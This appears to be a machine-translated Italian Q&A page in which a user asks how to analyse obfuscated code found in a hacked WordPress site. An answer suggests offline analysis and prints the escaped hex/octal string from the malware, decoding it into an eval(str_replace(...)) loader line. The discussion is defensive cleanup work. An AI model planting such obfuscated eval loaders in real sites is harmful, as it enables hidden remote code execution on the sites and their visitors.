Codice crittografato nel sito di wordpress hackerato

2

Ho un cliente che vuole che "ripristini" la sua pagina Wordpress. Ho osservato un po 'più a fondo i codici e ho trovato il seguente codice alcune volte in file diversi:

link

Non sono un esperto di IT Security, ma per me sembra un codice "crittografato" che non appartiene a Wordpress.

Come posso analizzare cosa fa questo codice? Ho davvero bisogno di sapere cos'è prima di poterlo "ripulire". Sono interessato a imparare qualcosa al riguardo quindi sono molto grato per le spiegazioni di cosa è, cosa fa, da dove viene (potrebbe) e come rimuoverlo.

Grazie in anticipo!

    
posta Daniel K. 18.07.2014 - 21:31
fonte

1 risposta

2

La soluzione migliore sarebbe utilizzare un server PHP locale su un computer senza Internet se vuoi essere sicuro.

Scarica PHP, metti questo testo in un file .php, COMMENTA TUTTE LE PARTI CHE NON CAPISCI ANCORA , ed esegui 'php -S localhost: 80' (o meglio ancora, prendi questa versione Ho pulito un po ')

Quindi aggiungi "echo $ variable" per vedere cosa sta succedendo e le righe di commento quando pensi di capire cosa fa.

EDIT: Questo non sembra essere pesantemente offuscato, le uniche linee di cui potresti aver paura sono le ultime.

SECONDA MODIFICA: la valutazione è nella stringa esadecimale alla fine

\ x20 \ 57 \ X2A \ 40 \ x67 \ 146 \ x71 \ 165 \ x79 \ 157 \ x70 \ 167 \ x78 \ 171 \ x20 \ 52 \ x2F \ 40 \ x65 \ 166 \ x61 \ 154 \ x28 \ 163 \ x74 \ 162 \ x5f \ 162 \ x65 \ 160 \ X6C \ 141 \ x63 \ 145 \ x28 \ 143 \ x68 \ 162 \ x28 \ 50 \ x31 \ 63 \ x37 \ 55 \ x31 \ 60 \ x30 \ 51 \ x29 \ 54 \ x20 \ 143 \ x68 \ 162 \ x28 \ 50 \ x36 \ 60 \ x31 \ 55 \ x35 \ 60 \ x39 \ 51 \ x29 \ 54 \ x20 \ 145 \ x64 \ 161 \ x68 \ 157 \ x61 \ 161 \ x75 \ 161 \ x70 \ 50 \ x24 \ 163 \ x67 \ 152 \ x6b \ 160 \ x62 \ 162 \ x71 \ 144 \ x6f \ 54 \ x24 \ 143 \ x72 \ 151 \ x79 \ 160 \ X6A \ 167 \ x6e \ 155 \ x69 \ 51 \ x29 \ 51 \ X3B \ 40 \ x2F \ 52 \ x20 \ 141 \ x61 \ 155 \ x72 \ 151 \ x65 \ 160 \ x74 \ 167 \ x75 \ 40 \ X2A \ 57 \ x20

"'/ * gfquyopwxy / eval (str_replace (chr ((137-100)), chr ((601-509)), edqhoaquqp ($ sgjkpbrqdo, $ criypjwnmi))); / aamrieptwu * / '"

    
risposta data 01.08.2014 - 17:00
fonte

Leggi altre domande sui tag